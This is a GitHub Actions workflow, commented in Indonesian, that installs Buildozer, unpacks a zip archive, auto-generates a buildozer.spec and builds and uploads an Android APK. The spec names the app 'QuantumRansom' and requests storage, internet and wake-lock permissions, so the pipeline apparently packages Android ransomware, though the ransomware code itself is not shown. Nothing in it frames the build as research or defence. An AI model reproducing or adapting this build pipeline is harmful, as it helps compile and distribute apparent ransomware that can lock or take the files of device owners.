name: Build APK

on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v4

      - name: Install dependencies
        run: |
          sudo apt update
          sudo apt install -y python3-pip openjdk-17-jdk zip unzip
          pip install buildozer cython

      - name: Extract zip
        run: |
          unzip quantum_apk.zip -d quantum
          cd quantum

      - name: Fix buildozer.spec (auto-generate)
        run: |
          cd quantum
          # Hapus spec yang rusak
          rm -f buildozer.spec
          # Buat spec baru dengan Python script
          python3 - <<EOF
import os, re
from pathlib import Path

# Deteksi semua file .py
py_files = list(Path('.').glob('*.py'))
if not py_files:
    print("Tidak ada file Python!")
    exit(1)

# Ambil semua import
imports = set()
for py in py_files:
    with open(py, 'r', encoding='utf-8') as f:
        content = f.read()
    # Cari import statements
    for line in content.split('\n'):
        if line.startswith('import ') or line.startswith('from '):
            parts = line.split()
            if len(parts) > 1 and parts[0] == 'import':
                module = parts[1].split('.')[0].split(',')[0].strip()
                imports.add(module)
            elif len(parts) > 1 and parts[0] == 'from':
                module = parts[1].split('.')[0].strip()
                imports.add(module)

# Mapping ke nama pip (khusus yang perlu)
mapping = {
    'cryptography': 'cryptography',
    'requests': 'requests',
    'plyer': 'plyer',
    'android': 'android',
    'kivy': 'kivy',
}
requirements = {'python3', 'kivy'}
for mod in imports:
    if mod in mapping:
        requirements.add(mapping[mod])
    elif mod not in {'os','sys','time','datetime','re','json','hashlib','base64','random','math'}:
        requirements.add(mod)

# Tulis spec baru
with open('buildozer.spec', 'w') as f:
    f.write(f"""[app]
title = QuantumRansom
package.name = quantum
package.domain = com.quantum
source.dir = .
source.include_exts = py,png,jpg,kv,atlas,txt
version = 0.1
requirements = {','.join(sorted(requirements))}
orientation = portrait
android.permissions = WRITE_EXTERNAL_STORAGE, READ_EXTERNAL_STORAGE, INTERNET, ACCESS_NETWORK_STATE, WAKE_LOCK
android.api = 31
android.minapi = 21
android.gradle = True
android.accept_sdk_license = True

[buildozer]
log_level = 2
""")
          print("✅ buildozer.spec baru telah dibuat.")
EOF

      - name: Build APK
        run: |
          cd quantum
          buildozer -v android debug

      - name: Upload APK
        uses: actions/upload-artifact@v4
        with:
          name: quantum-apk
          path: quantum/bin/*.apk
